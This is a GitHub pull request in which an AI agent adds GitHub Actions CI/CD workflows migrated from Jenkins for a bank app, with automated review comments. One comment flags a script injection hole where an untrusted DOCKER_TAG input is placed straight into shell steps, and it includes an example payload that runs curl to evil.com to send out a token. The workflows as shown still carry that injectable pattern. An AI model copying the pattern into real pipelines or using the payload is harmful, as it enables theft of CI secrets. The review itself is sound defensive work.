Skip to content

Migrate Jenkins CI/CD pipelines to GitHub Actions #97

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
devin-ai-integration wants to merge 2 commits into
base: DevOps
Choose a base branch
from
Open

Migrate Jenkins CI/CD pipelines to GitHub Actions #97

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
2 commits
Select commit Hold shift + click to select a range
be5947d
Add GitHub Actions CI/CD workflows migrated from Jenkins
devin-ai-integration[bot] Feb 11, 2026
08ea1ab
Make SonarQube and Docker steps skip gracefully when secrets are not …
devin-ai-integration[bot] Feb 11, 2026
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
76 changes: 76 additions & 0 deletions .github/workflows/cd.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,76 @@
name: CD Pipeline

on:
workflow_call:
inputs:
DOCKER_TAG:
description: 'Docker tag of the image built by the CI job'
required: true
type: string
workflow_dispatch:
inputs:
DOCKER_TAG:
description: 'Docker tag of the image built by the CI job'
required: true
type: string

permissions:
contents: write

jobs:
deploy:
runs-on: ubuntu-latest

steps:
- name: Checkout code
uses: actions/checkout@v4
with:
ref: ${{ github.ref }}
token: ${{ secrets.GITHUB_TOKEN }}

- name: Verify Docker image tag
run: echo "DOCKER TAG RECEIVED - ${{ inputs.DOCKER_TAG }}"

- name: Update Kubernetes manifest
run: |
sed -i -e 's|trainwithshubham/bankapp-eks:.*|trainwithshubham/bankapp-eks:${{ inputs.DOCKER_TAG }}|g' kubernetes/bankapp-deployment.yml
Comment on lines +32 to +36
Copy link
Copy Markdown
Author

@devin-ai-integration devin-ai-integration Bot Apr 6, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

🔴 Script injection vulnerability via unsanitized inputs.DOCKER_TAG in shell commands

Multiple run: steps directly interpolate ${{ inputs.DOCKER_TAG }} (and ${{ github.event.inputs.DOCKER_TAG }}) into shell commands. Since workflow_dispatch allows users to supply arbitrary string input for DOCKER_TAG, a malicious value like v1"; curl http://evil.com/steal?t=$(cat $GITHUB_TOKEN); echo " could execute arbitrary commands. This affects ci.yml:31-32, cd.yml:32, cd.yml:36, and cd.yml:47. The safe pattern is to assign the expression to an environment variable first and reference it as $DOCKER_TAG in the shell.

Example of safe pattern 
env:
  DOCKER_TAG: ${{ inputs.DOCKER_TAG }}
run: |
  echo "DOCKER TAG RECEIVED - $DOCKER_TAG"
Prompt for agents 
In cd.yml, lines 32, 36, and 47 all directly interpolate ${{ inputs.DOCKER_TAG }} into shell run commands. This is a GitHub Actions script injection vulnerability because the DOCKER_TAG input can contain arbitrary characters when triggered via workflow_dispatch. The fix is to assign the input to an environment variable in each step (using env: DOCKER_TAG: ${{ inputs.DOCKER_TAG }}) and then reference it as $DOCKER_TAG in the shell script. The same issue exists in ci.yml lines 31-32 with ${{ github.event.inputs.DOCKER_TAG }}. All four occurrences across both files need to be fixed.
Open in Devin Review

Was this helpful? React with 👍 or 👎 to provide feedback.


- name: Commit and push changes
run: |
git config user.name "github-actions[bot]"
git config user.email "github-actions[bot]@users.noreply.github.com"
echo "Checking repository status:"
git status
echo "Adding changes to git:"
git add kubernetes/bankapp-deployment.yml
echo "Committing changes:"
git commit -m "Updated K8s Deployment Docker Image Version to ${{ inputs.DOCKER_TAG }}" || echo "No changes to commit"
echo "Pushing changes to github:"
git push

- name: Send deployment notification email
if: always()
uses: dawidd6/action-send-mail@v3
with:
server_address: ${{ secrets.MAIL_SERVER }}
server_port: ${{ secrets.MAIL_PORT }}
username: ${{ secrets.MAIL_USERNAME }}
password: ${{ secrets.MAIL_PASSWORD }}
subject: "BankApp Application has been updated and deployed - ${{ job.status }}"
to: ${{ secrets.NOTIFICATION_EMAIL }}
from: ${{ secrets.MAIL_USERNAME }}
content_type: text/html
body: |
<html>
<body>
<div style="background-color: #FFA07A; padding: 10px; margin-bottom: 10px;">
<p style="color: black; font-weight: bold;">Project: ${{ github.repository }}</p>
</div>
<div style="background-color: #90EE90; padding: 10px; margin-bottom: 10px;">
<p style="color: black; font-weight: bold;">Build Number: ${{ github.run_number }}</p>
</div>
<div style="background-color: #87CEEB; padding: 10px; margin-bottom: 10px;">
<p style="color: black; font-weight: bold;">URL: ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}</p>
</div>
</body>
</html>
106 changes: 106 additions & 0 deletions .github/workflows/ci.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,106 @@
name: CI Pipeline

on:
push:
branches: [main, DevOps]
pull_request:
branches: [main, DevOps]
workflow_dispatch:
inputs:
DOCKER_TAG:
description: 'Docker image tag for the build'
required: true
type: string

permissions:
contents: write

jobs:
build:
runs-on: ubuntu-latest
outputs:
docker_tag: ${{ steps.set-tag.outputs.docker_tag }}

steps:
- name: Checkout code
uses: actions/checkout@v4

- name: Set Docker tag
id: set-tag
run: |
if [ -n "${{ github.event.inputs.DOCKER_TAG }}" ]; then
echo "docker_tag=${{ github.event.inputs.DOCKER_TAG }}" >> "$GITHUB_OUTPUT"
else
echo "docker_tag=${GITHUB_SHA::7}" >> "$GITHUB_OUTPUT"
fi

- name: Trivy filesystem scan
uses: aquasecurity/trivy-action@master
with:
scan-type: 'fs'
scan-ref: '.'

- name: OWASP Dependency Check
uses: dependency-check/Dependency-Check_Action@main
with:
project: 'bankapp'
path: '.'
format: 'XML'
out: '.'

- name: Upload OWASP Dependency Check report
uses: actions/upload-artifact@v4
if: always()
with:
name: dependency-check-report
path: dependency-check-report.xml

- name: SonarQube Analysis
if: ${{ secrets.SONAR_TOKEN != '' && secrets.SONAR_HOST_URL != '' }}
uses: sonarsource/sonarqube-scan-action@v6
env:
SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }}
SONAR_HOST_URL: ${{ secrets.SONAR_HOST_URL }}
with:
args: >
-Dsonar.projectName=bankapp
-Dsonar.projectKey=bankapp

- name: SonarQube Quality Gate
if: ${{ secrets.SONAR_TOKEN != '' && secrets.SONAR_HOST_URL != '' }}
uses: sonarsource/sonarqube-quality-gate-action@master
timeout-minutes: 1
continue-on-error: true
env:
SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }}
SONAR_HOST_URL: ${{ secrets.SONAR_HOST_URL }}

- name: Log in to Docker Hub
if: ${{ secrets.DOCKERHUB_USERNAME != '' && secrets.DOCKERHUB_TOKEN != '' }}
uses: docker/login-action@v3
with:
username: ${{ secrets.DOCKERHUB_USERNAME }}
password: ${{ secrets.DOCKERHUB_TOKEN }}

- name: Build and push Docker image
if: ${{ secrets.DOCKERHUB_USERNAME != '' && secrets.DOCKERHUB_TOKEN != '' }}
uses: docker/build-push-action@v5
with:
context: .
push: true
tags: ${{ secrets.DOCKERHUB_USERNAME }}/bankapp:${{ steps.set-tag.outputs.docker_tag }}
Copy link
Copy Markdown
Author

@devin-ai-integration devin-ai-integration Bot Apr 6, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

🔴 Docker image name mismatch between CI build and CD deployment

The CI pipeline builds and pushes the Docker image to ${{ secrets.DOCKERHUB_USERNAME }}/bankapp:<tag> (ci.yml:91), but the CD pipeline updates the Kubernetes manifest to reference trainwithshubham/bankapp-eks:<tag> (cd.yml:36). Even if DOCKERHUB_USERNAME is trainwithshubham, the image repository names differ: bankapp vs bankapp-eks. This means the K8s deployment will be updated to reference an image tag that was never pushed to the bankapp-eks repository, causing the deployment to pull a non-existent (or stale) image and likely fail with an ImagePullBackOff error.

Prompt for agents 
The CI pipeline pushes the Docker image to the repository named 'bankapp' (ci.yml:91 uses secrets.DOCKERHUB_USERNAME/bankapp:tag), but the CD pipeline's sed command in cd.yml:36 updates the Kubernetes manifest to reference 'trainwithshubham/bankapp-eks:tag'. These are two different Docker image repositories. You need to make the image names consistent. Either change ci.yml line 91 to push to '<username>/bankapp-eks' to match what cd.yml expects, or change cd.yml line 36's sed replacement to use the same '<username>/bankapp' repository that CI pushes to. The Kubernetes deployment manifest (kubernetes/bankapp-deployment.yml:20) currently uses 'trainwithshubham/bankapp-eks:v2', so you would also need to update it if you change the repository name. Also consider using the DOCKERHUB_USERNAME secret in cd.yml instead of the hardcoded 'trainwithshubham' to keep it consistent with ci.yml.
Open in Devin Review

Was this helpful? React with 👍 or 👎 to provide feedback.


- name: Upload build artifacts
uses: actions/upload-artifact@v4
if: success()
with:
name: build-artifacts
path: '**/*.xml'

deploy:
needs: build
if: success() && (github.event_name == 'push' || github.event_name == 'workflow_dispatch')
uses: ./.github/workflows/cd.yml
with:
DOCKER_TAG: ${{ needs.build.outputs.docker_tag }}
secrets: inherit